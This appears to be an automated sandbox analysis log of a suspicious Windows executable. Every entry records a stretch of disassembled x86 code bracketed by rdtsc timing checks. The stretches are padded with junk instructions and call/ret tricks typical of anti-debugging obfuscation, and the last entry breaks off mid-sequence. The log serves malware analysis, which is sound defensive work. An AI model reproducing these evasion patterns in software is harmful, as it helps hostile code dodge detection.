Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9942D6 second address: 994313 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push ebx 0x0000000a jmp 00007F9DF4F36026h 0x0000000f pop ebx 0x00000010 pop ebx 0x00000011 nop 0x00000012 sbb dx, 5D1Ch 0x00000017 push 00000000h 0x00000019 and cx, 1F4Dh 0x0000001e call 00007F9DF4F36019h 0x00000023 push eax 0x00000024 push edx 0x00000025 push edi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 994313 second address: 994318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 994318 second address: 99433A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9DF4F36018h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9DF4F36021h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 99433A second address: 994344 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9DF58A6BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 994344 second address: 99434E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F9DF4F36016h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 99434E second address: 994352 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 994352 second address: 994378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jp 00007F9DF4F3601Eh 0x00000012 mov eax, dword ptr [eax] 0x00000014 jbe 00007F9DF4F36036h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 994378 second address: 99437C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 99437C second address: 9943E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36024h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007F9DF4F36029h 0x00000012 pop eax 0x00000013 mov esi, eax 0x00000015 push 00000003h 0x00000017 pushad 0x00000018 jp 00007F9DF4F36016h 0x0000001e sub dword ptr [ebp+122D358Eh], ecx 0x00000024 popad 0x00000025 add dword ptr [ebp+122D304Bh], eax 0x0000002b push 00000000h 0x0000002d mov edi, dword ptr [ebp+122D3C12h] 0x00000033 push 00000003h 0x00000035 sub dword ptr [ebp+122D316Ch], esi 0x0000003b push 96DD6D6Fh 0x00000040 push eax 0x00000041 push edx 0x00000042 ja 00007F9DF4F3601Ch 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9943E9 second address: 9943ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9943ED second address: 994471 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F3601Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 29229291h 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007F9DF4F36018h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a lea ebx, dword ptr [ebp+1244B189h] 0x00000030 mov ecx, dword ptr [ebp+122D3CBAh] 0x00000036 xchg eax, ebx 0x00000037 pushad 0x00000038 jmp 00007F9DF4F3601Dh 0x0000003d jmp 00007F9DF4F36023h 0x00000042 popad 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 push ecx 0x00000047 jmp 00007F9DF4F36027h 0x0000004c pop ecx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 994471 second address: 994477 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9944ED second address: 9945A4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jng 00007F9DF4F3601Eh 0x0000000f jng 00007F9DF4F36018h 0x00000015 push edi 0x00000016 pop edi 0x00000017 nop 0x00000018 push 00000000h 0x0000001a movzx esi, si 0x0000001d push 1E720033h 0x00000022 jmp 00007F9DF4F36022h 0x00000027 xor dword ptr [esp], 1E7200B3h 0x0000002e push 00000003h 0x00000030 xor esi, dword ptr [ebp+122D3CE2h] 0x00000036 push 00000000h 0x00000038 movsx ecx, bx 0x0000003b push 00000003h 0x0000003d jmp 00007F9DF4F3601Ch 0x00000042 push 71201F4Eh 0x00000047 jmp 00007F9DF4F36021h 0x0000004c add dword ptr [esp], 4EDFE0B2h 0x00000053 jmp 00007F9DF4F36023h 0x00000058 lea ebx, dword ptr [ebp+1244B192h] 0x0000005e jmp 00007F9DF4F36026h 0x00000063 mov dword ptr [ebp+122D23A7h], edx 0x00000069 push eax 0x0000006a jbe 00007F9DF4F3603Bh 0x00000070 push eax 0x00000071 push edx 0x00000072 jc 00007F9DF4F36016h 0x00000078 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 99461E second address: 99466B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9DF58A6BDCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F9DF58A6BE9h 0x00000010 nop 0x00000011 cmc 0x00000012 push 00000000h 0x00000014 mov esi, dword ptr [ebp+122D3C92h] 0x0000001a push 9719794Eh 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F9DF58A6BE2h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 99466B second address: 994671 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9880A7 second address: 9880CB instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9DF58A6BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9DF58A6BDCh 0x00000011 jmp 00007F9DF58A6BDCh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9880CB second address: 9880E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36022h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9B3BDE second address: 9B3C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F9DF58A6BE0h 0x0000000b jmp 00007F9DF58A6BE4h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9B3C09 second address: 9B3C0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9B3C0F second address: 9B3C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9B3DAC second address: 9B3DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F9DF4F36016h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9B3DB6 second address: 9B3DBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9B3DBA second address: 9B3DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9DF4F36025h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9DF4F36021h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9B41E7 second address: 9B4226 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F9DF58A6BDDh 0x00000008 pop edx 0x00000009 pushad 0x0000000a jmp 00007F9DF58A6BE1h 0x0000000f jl 00007F9DF58A6BD6h 0x00000015 jmp 00007F9DF58A6BDDh 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9B4226 second address: 9B422E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9B43C4 second address: 9B43C9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9B4767 second address: 9B476D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9B48F7 second address: 9B4911 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9DF58A6BDFh 0x00000008 jnp 00007F9DF58A6BD6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9B4AC7 second address: 9B4AE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jg 00007F9DF4F36016h 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 jmp 00007F9DF4F3601Bh 0x00000017 popad 0x00000018 push edi 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9B4DAD second address: 9B4DB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9B4DB3 second address: 9B4DB8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9A8F32 second address: 9A8F90 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007F9DF58A6BDFh 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F9DF58A6BE2h 0x0000001c popad 0x0000001d jmp 00007F9DF58A6BE8h 0x00000022 pushad 0x00000023 jnl 00007F9DF58A6BD6h 0x00000029 push ebx 0x0000002a pop ebx 0x0000002b push edi 0x0000002c pop edi 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 push esi 0x00000031 pop esi 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9A8F90 second address: 9A8F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 98B81C second address: 98B822 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9B546C second address: 9B5470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9B5470 second address: 9B5490 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9B5490 second address: 9B5496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9B5496 second address: 9B54AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9DF58A6BE3h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9B54AE second address: 9B54C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F3601Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9B54C1 second address: 9B54D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9DF58A6BE1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9B54D6 second address: 9B54DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9B5616 second address: 9B5643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F9DF58A6BD6h 0x0000000a jmp 00007F9DF58A6BDFh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9DF58A6BE1h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9BAC67 second address: 9BAC73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9BAC73 second address: 9BAC77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C0B50 second address: 9C0B78 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop edx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F9DF4F3601Eh 0x00000010 push eax 0x00000011 jmp 00007F9DF4F3601Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C0B78 second address: 9C0B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b jbe 00007F9DF58A6BE2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C0B8B second address: 9C0B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C0251 second address: 9C0255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C0255 second address: 9C026F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F9DF4F36016h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F9DF4F3601Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C026F second address: 9C028D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F9DF58A6BE8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C0674 second address: 9C0684 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9DF4F3601Ah 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C0684 second address: 9C068D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C068D second address: 9C0693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C0693 second address: 9C06D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F9DF58A6BE1h 0x0000000d jns 00007F9DF58A6BEDh 0x00000013 jmp 00007F9DF58A6BE7h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007F9DF58A6BDAh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C06D7 second address: 9C06E1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9DF4F36016h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C0836 second address: 9C083A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C083A second address: 9C0840 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C0840 second address: 9C086D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9DF58A6BE8h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9DF58A6BDDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C09B0 second address: 9C09B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C09B4 second address: 9C09BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C09BA second address: 9C09F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F9DF4F36025h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F9DF4F3601Dh 0x00000013 popad 0x00000014 je 00007F9DF4F36022h 0x0000001a ja 00007F9DF4F36016h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C3076 second address: 9C308B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 jp 00007F9DF58A6BF2h 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F9DF58A6BD6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C3118 second address: 9C3139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 add dword ptr [esp], 35AF26BEh 0x0000000c sub esi, 08C7A244h 0x00000012 push 6453FB2Bh 0x00000017 push eax 0x00000018 push edx 0x00000019 jbe 00007F9DF4F3601Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C3139 second address: 9C313D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C328A second address: 9C3294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F9DF4F36016h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C3294 second address: 9C32AF instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9DF58A6BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F9DF58A6BDCh 0x00000015 jnp 00007F9DF58A6BD6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C36BC second address: 9C36C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C3D7B second address: 9C3D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C3F17 second address: 9C3F30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F3601Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jbe 00007F9DF4F36035h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C434F second address: 9C4359 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9DF58A6BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C484F second address: 9C4853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C4853 second address: 9C4864 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9DF58A6BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C4864 second address: 9C487C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9DF4F36021h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C8798 second address: 9C879F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C8590 second address: 9C8594 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C879F second address: 9C8809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 call 00007F9DF58A6BE3h 0x0000000d cmc 0x0000000e pop edi 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F9DF58A6BD8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b jmp 00007F9DF58A6BE9h 0x00000030 push 00000000h 0x00000032 and si, BD45h 0x00000037 xchg eax, ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C8809 second address: 9C8813 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9DF4F36016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C8813 second address: 9C8820 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C922D second address: 9C92C2 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9DF4F3601Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d xor dword ptr [ebp+12453C29h], ecx 0x00000013 jnc 00007F9DF4F36020h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007F9DF4F36018h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 adc edi, 352BE5D3h 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push edi 0x00000040 call 00007F9DF4F36018h 0x00000045 pop edi 0x00000046 mov dword ptr [esp+04h], edi 0x0000004a add dword ptr [esp+04h], 00000019h 0x00000052 inc edi 0x00000053 push edi 